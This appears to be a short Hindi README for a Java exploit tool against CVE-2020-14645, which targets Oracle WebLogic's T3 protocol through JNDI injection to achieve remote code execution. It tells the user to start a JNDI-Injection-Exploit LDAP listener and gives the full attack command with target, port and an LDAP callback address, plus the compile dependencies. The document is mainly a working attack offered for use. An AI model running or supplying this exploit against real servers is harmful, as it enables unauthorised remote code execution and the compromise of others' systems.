
CVE-2020-14645 के लिए Java-आधारित एक्सप्लॉइट जो Oracle WebLogic T3 प्रोटोकॉल को JNDI इंजेक्शन के साथ लक्षित करता है, दूरस्थ कोड निष्पादन के लिए।
सबसे पहले NDI-Injection-Exploit का उपयोग करके सुनें और एक ldap पता उत्पन्न करें।
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Tatget और -RMI अनिवार्य हैं, https के लिए --SSL पैरामीटर का उपयोग किया जा सकता है, -Port डिफ़ॉल्ट 7001 है।
स्वयं संकलन करने के लिए coherence.jar और wlfullclient.jar जोड़ना आवश्यक है।